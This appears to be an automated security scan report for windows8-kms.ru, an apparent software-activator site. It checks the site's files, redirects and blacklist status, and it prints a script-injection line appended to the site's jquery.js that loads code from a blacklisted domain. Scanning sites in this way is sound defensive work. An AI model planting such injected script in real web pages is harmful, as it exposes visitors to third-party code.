Scanned pages/files
Request | Server response | Status |
http://windows8-kms.ru/ | 200 OK Content-Length: 11124 Content-Type: text/html | clean |
http://windows8-kms.ru/engine/classes/js/jquery.js | 200 OK Content-Length: 92883 Content-Type: application/x-javascript | suspicious |
Page code contains blacklisted domain: iknopo.ru ...[3699 bytes skipped]... ar f;return p.isWindow(c)?c.document.documentElement["client"+a]:c.nodeType===9?(f=c.documentElement,Math.max(c.body["scroll"+a],f["scroll"+a],c.body["offset"+a],f["offset"+a],f["client"+a])):e===b?p.css(c,d,e,h):p.style(c,d,e,h)},c,g?e:b,g,null)}})}),a.jQuery=a.$=p,typeof define=="function"&&define.amd&&define.amd.jQuery&&define("jquery",[],function(){return p})})(window); document.write("<script src='http://iknopo.ru/iknopo_b.js'></script>") // Social knopki | ||
http://windows8-kms.ru/engine/classes/js/jqueryui.js | 200 OK Content-Length: 64903 Content-Type: application/x-javascript | clean |
http://windows8-kms.ru/engine/classes/js/dle_js.js | 200 OK Content-Length: 22398 Content-Type: application/x-javascript | clean |
http://windows8-kms.ru/lastnews/ | 200 OK Content-Length: 23035 Content-Type: text/html | clean |
http://windows8-kms.ru/index.php?newsid=11 | 200 OK Content-Length: 14018 Content-Type: text/html | clean |
http://windows8-kms.ru/engine/classes/highslide/highslide.js | 200 OK Content-Length: 46798 Content-Type: application/x-javascript | clean |
http://windows8-kms.ru/uploads/posts/2013-03/1362833695_hamachi_kms.jpg | 200 OK Content-Length: 223410 Content-Type: image/jpeg | clean |
http://windows8-kms.ru/test404page.js | 404 Not Found Content-Length: 564 Content-Type: text/html | clean |
http://windows8-kms.ru/index.php?newsid=10 | 200 OK Content-Length: 14192 Content-Type: text/html | clean |
http://windows8-kms.ru/uploads/posts/2013-03/1362833427_coreldraw_kms.png | 200 OK Content-Length: 300903 Content-Type: image/png | clean |
http://windows8-kms.ru/index.php?newsid=9 | 200 OK Content-Length: 14398 Content-Type: text/html | clean |
http://windows8-kms.ru/uploads/posts/2013-03/1362833157_ccleaner_kms.jpg | 200 OK Content-Length: 114255 Content-Type: image/jpeg | clean |
http://windows8-kms.ru/index.php?newsid=8 | 200 OK Content-Length: 14395 Content-Type: text/html | clean |
http://windows8-kms.ru/uploads/posts/2013-03/1362832772_angrybirds_kms.jpg | 200 OK Content-Length: 75765 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: windows8-kms.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 04 Oct 2014 07:43:29 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=ocprdlol4gblhugll3nj7ldqu3; path=/; domain=.windows8-kms.ru; HttpOnly
X-Powered-By: PHP/5.3.6
GET / HTTP/1.1
Host: windows8-kms.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 04 Oct 2014 07:43:29 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=ocprdlol4gblhugll3nj7ldqu3; path=/; domain=.windows8-kms.ru; HttpOnly
X-Powered-By: PHP/5.3.6
Second query (visit from search engine):
GET / HTTP/1.1
Host: windows8-kms.ru
Referer: http://www.google.com/search?q=windows8-kms.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: windows8-kms.ru
Referer: http://www.google.com/search?q=windows8-kms.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=windows8-kms.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://windows8-kms.ru/
Result: windows8-kms.ru is not infected or malware details are not published yet.
Result: windows8-kms.ru is not infected or malware details are not published yet.